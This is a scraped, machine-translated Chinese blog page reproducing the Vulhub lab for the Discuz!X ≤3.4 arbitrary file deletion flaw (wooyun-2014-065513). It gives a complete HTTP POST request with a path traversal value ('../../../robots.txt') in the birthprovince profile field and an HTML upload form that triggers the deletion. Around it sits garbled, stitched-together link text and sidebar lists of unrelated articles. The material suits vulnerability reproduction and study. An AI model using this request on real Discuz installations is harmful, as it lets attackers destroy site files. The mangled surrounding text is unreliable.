当前位置:网站首页>wooyun-2014-065513
wooyun-2014-065513
2022-06-25 19:09:00 【B6 capsule】
utilize Vulnhub A loophole is repeated - Discuz!X ≤3.4 Arbitrary file deletion vulnerability _JiangBuLiu The blog of -CSDN Blog _ Arbitrary file deletion vulnerability Apache SSI Remote command execution vulnerability Vulnhub Official reproduction tutorial principle of vulnerability reproduction vulnerability startup environment vulnerability reproduction FormhashCookie Send packet Vulnhub Official reproduction tutorial https://vulhub.org/#/environments/httpd/ssi-rce/ The vulnerability principle is used to test the vulnerability of uploading arbitrary files , The target server may not allow uploading php Postfix file . If the target server is turned on SSI And CGI Support , We can upload a ...https://blog.csdn.net/JiangBuLiu/article/details/94051762Vulhub - Docker-Compose file for vulnerability environment
https://vulhub.org/#/environments/discuz/x3.4-arbitrary-file-deletion/Discuz!X ≤3.4 Arbitrary file deletion vulnerability (wooyun-2014-065513)_ Black and white blogs -CSDN Blog Declare to study hard , Daily upward vulnerability description Discuz!X Community software is an adoption PHP and MySQL And other databases 、 Comprehensive function 、 Safe and stable community forum platform .2017 year 9 month 29 Japan ,Discuz! Fixed a security issue 2 For enhanced security , This vulnerability can lead to the vulnerability that the foreground user can cause arbitrary deletion of files .2017 year 9 month 29 Japan , Know Chuangyu 404 The laboratory starts emergency , I know Chuangyu 404 Laboratory analysis confirmation , The flaw lies in 2014 year 6 Month was submitted to Wooyun Vulnerability platform ,Seebug The vulnerability platform contains the vulnerability 3, Hole number ssvid-93588. This vulnerability is detected by configuring attribute values ,https://blog.csdn.net/zy15667076526/article/details/110719603?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4.pc_relevant_default&utm_relevant_index=5
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
your formhash
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../robots.txt # This is the file address
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
Any file specifies
Use the same browser to open
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>
边栏推荐
- Ali visual AI training camp -day03- construction of electronic photo album (face and expression recognition)
- mysql事务讲解
- In 2021, China's private equity market is growing, and the scale of private equity fund management reaches 19.78 trillion yuan [figure]
- What are Baidu collection skills? 2022 Baidu article collection skills
- Overview and trend analysis of China's foreign direct investment industry in 2020 [figure]
- Huawei released two promotion plans to promote AI talent development and scientific research innovation
- Why are life science enterprises on the cloud in succession?
- 【C语言练习——打印上三角及其变形(带空格版)】
- Electronic basic project construction & communication between main thread and rendering thread
- JS get data
猜你喜欢
![Overview and trend analysis of China's foreign direct investment industry in 2020 [figure]](/img/b3/73e01601885eddcd05b68a20f83ca8.jpg)
Overview and trend analysis of China's foreign direct investment industry in 2020 [figure]
JVM|运行时数据区(堆空间)
Detailed explanation of oauth2 - Introduction (I)
Current situation and development suggestions of China's green PPP project industry: the investment scale is expanding, and the existing problems need to be improved to further promote the healthy dev
![Analysis of global tea production, consumption and import and export trade: China's tea production ranks first in the world [figure]](/img/16/ab5056dd26cf7b1a761a92eea46e54.jpg)
Analysis of global tea production, consumption and import and export trade: China's tea production ranks first in the world [figure]
Kotlin Compose 终结toDo项目 点击可以编辑修改todo
![[today in history] June 25: the father of notebook was born; Windows 98 release; First commercial use of generic product code](/img/ef/a26127284fe57ac049a4313d89cf97.png)
[today in history] June 25: the father of notebook was born; Windows 98 release; First commercial use of generic product code
Analysis on employment compensation of 2021 college graduates: the average monthly starting salary of doctors, masters, undergraduates and junior colleges is 14823 yuan, 10113 yuan, 5825 yuan and 3910
![Current situation and trend analysis of China's glass packaging containers in 2021: the revenue of glass packaging containers increases year by year [figure]](/img/19/d93c8647415c593de9c3c959f72d64.jpg)
Current situation and trend analysis of China's glass packaging containers in 2021: the revenue of glass packaging containers increases year by year [figure]
Miner's Diary: why should I go mining on April 5, 2021
随机推荐
网络安全检测与防范 测试题(五)
Tcp/ip test questions (III)
TCP/IP 测试题(二)
Analysis of China's medical device industry development environment (PEST) in 2021: the awareness of medical care is enhanced, and the demand for medical device products is also rising [figure]
Tiger DAO VC产品正式上线,Seektiger生态的有力补充
QQ robot epidemic situation query / epidemic situation concern [latest beta2 version]
PHP database connection version1.1
解决sublime Text3 package control 无法安装插件问题
Current situation of China's hydraulic cylinder industry in 2020 (with application fields, policies and regulations, supply and demand status and enterprise pattern) [figure]
Error record: preg_ match(): Compilation failed: range out of order in character class at offset 13
网络安全检测与防范 测试题(一)
Analysis of global tea production, consumption and import and export trade: China's tea production ranks first in the world [figure]
一、HikariCP获取连接流程源码分析一
Network security detection and prevention test questions (V)
[C language practice - print the upper triangle and its deformation (with blank version)]
From the perspective of the core competitiveness of ABT, the Internet giant, who fell first
What should I pay attention to in GoogleSEO content station optimization?
Server journey from scratch - Yu Zhongxian integrated version (IP access server, LNMP compilation and installation, Lua environment and socket expansion)
MySQL view explanation
JVM | runtime data area (heap space)